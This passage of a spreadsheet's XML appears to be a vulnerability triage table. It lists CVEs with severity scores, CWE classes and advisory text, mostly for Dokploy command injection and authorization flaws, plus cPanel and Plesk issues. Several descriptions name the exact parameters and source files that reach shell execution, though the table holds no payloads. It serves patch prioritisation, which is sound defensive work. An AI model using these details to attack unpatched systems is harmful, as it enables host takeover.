          <t>A flaw was found in the managedcluster-import-controller. The Certificate Signing Request (CSR) auto-approval logic improperly validates incoming CSRs, specifically by not inspecting the signer name or decoding the PEM-encoded x509 CSR. This vulnerability allows a privileged service account on a spoke cluster to submit a malicious CSR. Successful exploitation can lead to privilege escalation, enabling the attacker to obtain administrative credentials on the hub cluster.</t>
        </is>
      </c>
      <c r="M68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66795</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67401</t>
        </is>
      </c>
      <c r="C69" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E69" s="5" t="inlineStr"/>
      <c r="F69" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in cPanel allows a mail-enabled account to achieve remote code execution as root through SQLi in EmailTrack component</t>
        </is>
      </c>
      <c r="M69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67401</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68487</t>
        </is>
      </c>
      <c r="C70" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E70" s="5" t="inlineStr"/>
      <c r="F70" s="5" t="inlineStr"/>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>Path traversal in Plesk's Backup Manager causes arbitrary file write as root by an authenticated customer.</t>
        </is>
      </c>
      <c r="M70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68487</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68488</t>
        </is>
      </c>
      <c r="C71" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E71" s="5" t="inlineStr"/>
      <c r="F71" s="5" t="inlineStr"/>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>A Time-of-check Time-of-use (TOCTOU) race condition leading to insecure symlink following in Plesk causes local privilege escalation to root via arbitrary file/directory ownership takeover.</t>
        </is>
      </c>
      <c r="M71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68488</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72733</t>
        </is>
      </c>
      <c r="C72" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E72" s="5" t="inlineStr"/>
      <c r="F72" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the backup.restoreBackupWithLogs tRPC subscription builds database restore shell pipelines from the user-controlled databaseName and backupFile fields without safely separating them from shell syntax. packages/server/src/utils/restore/utils.ts interpolates databaseName into database-specific restore commands, while packages/server/src/utils/restore/postgres.ts and the analogous restore modules interpolate backupFile into rclone paths. An authenticated member with backup-restore permission can inject operating-system commands that execute in the Dokploy host context through execAsync or execAsyncRemote, even when no valid database container or backup file exists. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72733</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72735</t>
        </is>
      </c>
      <c r="C73" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E73" s="5" t="inlineStr"/>
      <c r="F73" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L73" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, writeTraefikConfigRemote in packages/server/src/utils/traefik/application.ts serializes user-controlled Traefik configuration with yaml.stringify and interpolates the resulting yamlStr into an echo command executed through execAsyncRemote. Single quotes in redirect regex and replacement fields, basic authentication usernames, domain host values, or middleware configuration can terminate the shell quoting and execute arbitrary commands on managed remote servers with the configured SSH user's privileges. This vulnerability is caused by an incomplete fix for CVE-2026-45630. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72735</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72736</t>
        </is>
      </c>
      <c r="C74" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E74" s="5" t="inlineStr"/>
      <c r="F74" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G74" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L74" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy passes user-controlled values directly into shell commands via unquoted template literal interpolation in the registry credential testing and Docker Swarm cluster management endbpoints. Both endpoints have a safe local code path (using execFileAsync or the Docker API) but a vulnerable remote path (using execAsyncRemote which runs the shell string via SSH). This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72736</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72738</t>
        </is>
      </c>
      <c r="C75" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E75" s="5" t="inlineStr"/>
      <c r="F75" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L75" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the backup.listBackupFiles tRPC endpoint in apps/dokploy/server/api/routers/backup.ts passes the search parameter through normalizeS3Path and interpolates it into an rclone lsjson command executed by child_process.exec(), allowing an authenticated user with backup:read permission to execute arbitrary commands on the Dokploy host. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72738</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72740</t>
        </is>
      </c>
      <c r="C76" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E76" s="5" t="inlineStr"/>
      <c r="F76" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L76" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, packages/server/src/utils/providers/git.ts parses the user-controlled customGitUrl with sanitizeRepoPathSSH and interpolates its domain into the ssh-keyscan command from addHostToKnownHostsCommand without shell quoting, allowing an authenticated member with service deployment permission and an attached SSH key to execute arbitrary commands on the Dokploy host during deployment. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72740</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72862</t>
        </is>
      </c>
      <c r="C77" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E77" s="5" t="inlineStr"/>
      <c r="F77" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G77" s="5" t="inlineStr">
        <is>
          <t>docker, mysql, redis</t>
        </is>
      </c>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the mariadb.ts, mongo.ts, mysql.ts, postgres.ts, redis.ts, and libsql.ts Dokploy database service deployment functions pass user-controlled dockerImage fields unquoted into docker pull ${dockerImage} shell commands on the remote-server code path. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72862</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72863</t>
        </is>
      </c>
      <c r="C78" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E78" s="5" t="inlineStr"/>
      <c r="F78" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G78" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, Dokploy's WebSocket handlers (in-app terminals and log streamers) authenticate the session but never authorize it. They establish who the user is via validateRequest() and then proceed without consulting the role/permission model that every tRPC procedure enforces. Any authenticated member, can therefore open an interactive shell into any container on the host, including the dokploy container that mounts the Docker socket, and from there obtain root on the host, escaping the application and crossing every tenant boundary. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72863</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72864</t>
        </is>
      </c>
      <c r="C79" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E79" s="5" t="inlineStr"/>
      <c r="F79" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G79" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L79" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the local branch of /docker-container-terminal in apps/dokploy/server/wss/docker-container-terminal.ts authenticates with validateRequest but does not authorize the attacker-controlled containerId against the caller's role, organization, or service access before passing it to `docker exec`, allowing any authenticated member to obtain a root shell in arbitrary containers on a self-hosted instance. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72864</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72865</t>
        </is>
      </c>
      <c r="C80" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E80" s="5" t="inlineStr"/>
      <c r="F80" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G80" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L80" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the compose.update operation stores an unvalidated composePath that packages/server/src/utils/builders/compose.ts and packages/server/src/services/compose.ts interpolate into docker compose -f, docker stack deploy -c, and touch shell commands executed through /bin/sh -c. An authenticated member with compose write and deploy permission can supply a crafted composePath, trigger compose.deploy or startCompose, and execute arbitrary operating-system commands in the Docker-privileged Dokploy host context. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72865</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72867</t>
        </is>
      </c>
      <c r="C81" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E81" s="5" t="inlineStr"/>
      <c r="F81" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G81" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-602, CWE-78</t>
        </is>
      </c>
      <c r="L81" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.29.3 until 0.29.13, the incomplete fix for CVE-2026-45628 leaves packages/server/src/db/schema/compose.ts branch fields without server-side validation, allowing a direct compose.update request to store a malicious customGitBranch, branch, gitlabBranch, bitbucketBranch, or giteaBranch. A low-privileged authenticated user can trigger compose.deploy, which passes the stored branch to shell-based Git clone commands in packages/server/src/utils/providers/git.ts, github.ts, gitlab.ts, bitbucket.ts, and gitea.ts, resulting in arbitrary host command execution. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72867</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72868</t>
        </is>
      </c>
      <c r="C82" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E82" s="5" t="inlineStr"/>
      <c r="F82" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G82" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-862</t>
        </is>
      </c>
      <c r="L82" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, apps/dokploy/server/api/routers/destination.ts interpolates the accessKey, secretAccessKey, region, endpoint, provider, and bucket fields from destination.testConnection into an rclone ls command executed through child_process.exec. The `withPermission("destination", "create")` path permits a low-privileged organization member to reach the mutation, close a quoted argument with a crafted field, and execute arbitrary commands in the root Dokploy container, which has access to the host Docker socket. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72868</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72869</t>
        </is>
      </c>
      <c r="C83" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E83" s="5" t="inlineStr"/>
      <c r="F83" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G83" s="5" t="inlineStr">
        <is>
          <t>docker, node.js, postgresql, mysql, mongodb</t>
        </is>
      </c>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L83" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the backup.restoreBackupWithLogs tRPC subscription passes the databaseName parameter to restore builders in packages/server/src/utils/restore/utils.ts, where PostgreSQL, MariaDB, MySQL, and MongoDB commands embed the value in nested shell text executed by Node.js exec. An authenticated user with backup:restore permission can supply a crafted databaseName that the host /bin/sh expands before docker exec, resulting in arbitrary commands running in the Docker-privileged host context. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72869</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72872</t>
        </is>
      </c>
      <c r="C84" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E84" s="5" t="inlineStr"/>
      <c r="F84" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, application.saveBitbucketProvider stores bitbucketOwner and bitbucketRepository without validation and cloneBitbucketRepository in packages/server/src/utils/providers/bitbucket.ts interpolates those values into git clone commands executed through execAsync or execAsyncRemote, allowing a member with service deployment permission to execute arbitrary operating system commands on the Dokploy host or target server. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72872</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72876</t>
        </is>
      </c>
      <c r="C85" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E85" s="5" t="inlineStr"/>
      <c r="F85" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G85" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-78, CWE-862</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, swarm.getNodes, swarm.getNodeInfo, swarm.getNodeApps, and swarm.getAppInfos in apps/dokploy/server/api/routers/swarm.ts accept another organization’s serverId without an activeOrganizationId ownership check, and getNodeInfo in packages/server/src/services/docker.ts interpolates nodeId into execAsyncRemote, allowing a caller with server:read permission to execute arbitrary commands as the configured SSH user on another tenant’s server. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72876</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72880</t>
        </is>
      </c>
      <c r="C86" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E86" s="5" t="inlineStr"/>
      <c r="F86" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the apiCreateCertificate schema in packages/server/src/db/schema/certificate.ts accepts a client-supplied certificatePath, and packages/server/src/services/certificate.ts joins that value to the certificate root without confinement. An authenticated user with certificate create or delete permission can use certificatePath to write attacker-controlled certificate content outside the intended directory or delete an out-of-root directory. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72880</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72882</t>
        </is>
      </c>
      <c r="C87" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E87" s="5" t="inlineStr"/>
      <c r="F87" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.28.8 and earlier, an authenticated user who can create or update file mounts for a service can inject shell metacharacters into filePath, causing Dokploy to execute attacker-controlled commands on the configured remote managed server over SSH. In the default deployment model, this yields direct remote host RCE from the web interface.</t>
        </is>
      </c>
      <c r="M87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72882</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72886</t>
        </is>
      </c>
      <c r="C88" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="D88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="L88" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). From 0.29.2 until 0.29.13, schedule.create and schedule.update in apps/dokploy/server/api/routers/schedule.ts derive serviceId from applicationId or composeId and execute the owner/admin host-schedule gate only in the alternative branch, allowing a member with access to one application to attach its applicationId to a dokploy-server schedule and run a supplied script as root through schedule.runManually. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72886</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72901</t>
        </is>
      </c>
      <c r="C89" s="5" t="n">
        <v>9.9</v>
      </c>
